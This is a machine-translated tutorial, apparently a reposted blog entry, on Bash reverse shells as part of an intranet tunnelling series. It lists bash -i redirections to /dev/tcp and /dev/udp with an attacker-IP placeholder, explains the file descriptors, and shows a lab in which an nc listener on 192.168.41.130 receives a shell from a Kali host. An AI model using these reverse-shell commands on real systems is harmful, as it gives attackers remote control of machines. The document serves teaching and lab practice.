Intranet tunnel proxy technology (7) Bash rebound shell

Enterprise 2023-07-01 06:07:38 views: null

Bash rebound shell

Introduction to Bash

Shell, also known as terminal or shell, is the translator between people and the kernel, and Bash is the default Shell used in Linux

Bash reverse shell commands are as follows:

bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1
bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&2
bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1
bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2

Next, we break down step by step and introduce these parameters in detail

"bash-i" means to open an interactive shell

The "&" symbol is used to distinguish between files and file descriptors. When the ">&" symbol is followed by a file, it means that the standard output and standard error output are redirected to the file. When the ">&" symbol is followed by a number, it means that the following number is File descriptor, without the "&" symbol, the following number will be regarded as a file. Numbers "0", "1", and "2" are file descriptors under LinuxShell, "0" refers to standard input redirection, "1" refers to standard output redirection, and "2" refers to error output redirection.

"tcp" and "udp" in the "/dev" directory are special devices in Linux, which can be used to establish a Socket connection. Reading and writing these two files is equivalent to transmitting data in a Socket connection. ">&/dev/tcp/attacker_ip/attacker port" means to redirect the standard output and standard error output to the "/dev/tcp/attacker ip/attacker port" file, that is, to redirect When the attack aircraft arrives, the command execution result of the target aircraft can be seen from the attack aircraft. "0>&1" or "0>&2" redirects the standard input to the standard output, and the standard output is redirected to the attack plane, so the standard input is also redirected to the attack plane, so that the command can be input through the attack plane, and You can see the command execution result output

Introduction to Experimental Environment

experimental topology

insert image description here

Machine name IP machine
attack machine 192.168.41.130 windows
server 192.168.41.132 kali

Experimental reproduction

The attacking machine uses nc to execute the monitoring command

#监听 TCP
nc64.exe -lvvp 9999 
#监听UDP
nc64.exe -lup 9999

insert image description here

The experimental server executes the connection command

bash -i >&/dev/tcp/192.168.41.130/9999 0>&1

insert image description here

View the results and found that we successfully obtained the target server IP

insert image description here

Guess you like

Origin blog.csdn.net/qq_64973687/article/details/131385453
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com